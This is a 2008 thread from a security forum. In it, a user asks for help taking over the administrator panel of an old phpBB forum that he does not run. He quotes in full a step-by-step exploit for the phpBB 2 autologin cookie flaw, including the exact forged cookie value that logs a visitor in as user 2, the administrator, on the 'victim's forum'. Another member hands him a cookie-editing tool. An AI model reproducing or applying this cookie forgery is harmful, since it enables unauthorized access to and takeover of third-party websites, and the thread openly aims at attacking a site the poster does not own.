|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Need help with this? |
|
Posted: Mon Mar 31, 2008 2:31 pm |
|
|
Jakobsen |
Regular user |
|
|
Joined: Mar 31, 2008 |
Posts: 7 |
|
|
|
|
|
|
|
Hello. I'm sitting here and wondering how U all smart heads can figure all this out. Maybe many have read and read, and just have it as a hobby. I've looked at this forum for a couple of days now and read and read, but my english is not so well, so the hard things, its difficult to understand.
Im sitting here and I want to try to get admin-panel, (controlpanel), but i cant. I've watched SO MANY videos and read in here, but again, didnt understand so much.
Many are talking about HASH, and cookie.. But when i try to find the folder cookie.txt, i cant? And i cant find my cookies in the computer.
I can only find the cookies if im going into it when Mozilla Firefox is open at the same time. Do i need some programs? And yes, i've tried to find something about it. But again, im from Denmark, so its a bit difficult to understand all the hard words.
Regards. |
|
|
|
|
|
-.. |
|
Posted: Mon Mar 31, 2008 2:34 pm |
|
|
Jakobsen |
Regular user |
|
|
Joined: Mar 31, 2008 |
Posts: 7 |
|
|
|
|
|
|
|
When i try to find out what version it is (because that is important), this is coming: Powered by phpBB © 2001, 2005 phpBB Group
But that does not tell what version. But as i know, its very old. 2-3 years.
Maybe this can help to figure out the version:
We request you retain the full copyright notice below including the link to www.phpbb.com.
This not only gives respect to the large amount of time given freely by the developers
but also helps build interest, traffic and use of phpBB 2.0. If you cannot (for good
reason) retain the full copyright we request you at least leave in place the
Powered by phpBB line, with phpBB linked to www.phpbb.com. If you refuse
to include even this then support on our forums may be affected.
I found that in the source-code. |
|
|
|
|
Posted: Mon Mar 31, 2008 2:36 pm |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
|
|
|
|
Posted: Mon Mar 31, 2008 2:41 pm |
|
|
Jakobsen |
Regular user |
|
|
Joined: Mar 31, 2008 |
Posts: 7 |
|
|
|
|
|
|
|
Thanks. That was 1 step further. The Edit Cookies i found before, that couldnt download, because it was too old. But the link u just send me, that worked. Thanks.
Now i vil look at this, and turn back, when i run into more problems (sure i do again ) |
|
|
|
|
|
.. |
|
Posted: Mon Mar 31, 2008 2:50 pm |
|
|
Jakobsen |
Regular user |
|
|
Joined: Mar 31, 2008 |
Posts: 7 |
|
|
|
|
|
|
|
1 - or more stupid questions.
I've red this topic again and again.
"** YOU DON'T HAVE TO REGISTER AT THE VICTIM'S FORUM..
1- Simply VISIT the forum using Mozilla Firefox.. and be sure that the cookie is made (:
3- Close the Browser ..
2- Open the cookies.txt ..((located on "C:\Documents and Settings\ALI\Application Data\Mozilla\Firefox\Profiles\ur4nn6o5.default" when using WinXP)) in example Wink
and you will find something like :
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
where 127.0.0.1 is the domain for the forum << tested on localhost
and a%3A0%3A%7B%7D is the cookie data ..<< as a visitor
3- ok..let's do it !! ..
now open cookies.txt with your text editor
and replace
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
with
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
---------------------------------------------------------------------------------------------------------------//
save the cookies.txt..
4- Open your Browser..and go to the exploited forum ..
>>enjoy Hi Permission mode !! Very Happy
complete the mission by clicking " Go to Administration Panel "
http://www.waraxe.us/ftopict-610.html"
Im visiting the forum i want to log in as an admin. I have a account there, but as i understand, i dont need to log in. So i dont.
I have the Cookie Editor.
Now it says that i shall open cookies.txt .. I've searched in the computer, and i dont got the file. Is it a file i shall create myself? Or what?
Can i maybe get a msn or something, to talk to? Thats a bit easier.
Sorry my stupidness. |
|
|
|
|
|
|
|
|
Posted: Mon Mar 31, 2008 4:56 pm |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
This not work in new phpBB version.
I give you program to edit cookies. |
|
|
|
|
Posted: Mon Mar 31, 2008 6:44 pm |
|
|
Jakobsen |
Regular user |
|
|
Joined: Mar 31, 2008 |
Posts: 7 |
|
|
|
|
|
|
|
koko wrote: | This not work in new phpBB version.
I give you program to edit cookies. |
Im pretty sure that it's an old version. Almost 100.
Yes. And thanks. But when i have read and read, and dont know what to do now, there is not much to do. I've created my own PhpBBforum for some weeks ago to try it out, but without luck to reach into the adminpanel.
Yes. I'm a noob. Or noob isn't the word. Ultra-noob. |
|
|
|
|
Posted: Tue Apr 01, 2008 1:28 am |
|
|
gibbocool |
Advanced user |
|
|
Joined: Jan 22, 2008 |
Posts: 208 |
|
|
|
|
|
|
|
|
|
|
|
Posted: Tue Apr 01, 2008 2:13 pm |
|
|
Jakobsen |
Regular user |
|
|
Joined: Mar 31, 2008 |
Posts: 7 |
|
|
|
|
|
|
|
|
|
|
|
Posted: Tue Apr 01, 2008 2:26 pm |
|
|
Jakobsen |
Regular user |
|
|
Joined: Mar 31, 2008 |
Posts: 7 |
|
|
|
|
|
|
|
To make it easier to understand me, i've send this screenshot.. Maybe that can help.
I've logged in.. So the cookie is created. I found sys(bla bla)_data.. And push on it. But then there isnt anymore. Only a long cookie called all kind of letters, but nothing else.. Here:
|
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|